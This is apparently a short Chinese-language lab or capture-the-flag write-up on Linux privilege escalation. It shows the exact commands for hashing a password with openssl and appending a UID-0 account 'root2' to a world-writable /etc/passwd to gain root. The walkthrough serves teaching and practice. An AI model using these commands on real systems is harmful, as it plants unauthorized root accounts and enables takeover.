濫用 Linux 密碼提權
濫用 Linux 密碼提權
除非使用集中式憑證系統(例如 Active Directory 或 LDAP),否則 Linux 密碼通常儲存在 /etc/shadow 中,帳號則可以在 /etc/passwd 中察看
但有時密碼雜湊值也會存在 /etc/passwd 檔案中
如果 /etc/passwd 使用者記錄的第二列中存在密碼雜湊 ,則它被視為對身份驗證有效
並且優先於/etc/shadow 中的相應條目
預設在 linux 中 openssl 採用 crypt 演算法來產生密碼的雜湊值
讓我們一樣透過 joe 登入到靶機並查看 /etc/passwd 的權限
發現其他使用者擁有 rw 的權限,意味著我們可以直接修改編輯該檔案
接著使用 openssl 產生一個密碼 w00t 的雜湊值
openssl passwd w00t
然後塞入一個新的超級使用者 root2 與密碼雜湊值
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
接著試著使用 su root2 提權,並輸入剛剛建立的密碼 w00t
就可以看到拿到 root 了
接著拿 flag 吧
留言
張貼留言